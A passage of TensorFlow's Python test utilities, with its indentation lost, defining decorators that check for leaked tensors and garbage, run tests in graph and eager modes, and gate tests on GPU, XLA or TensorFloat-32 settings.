# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if is_tfrt_enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if is_tfrt_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
Args:
a: First input to tf.linalg.matmul
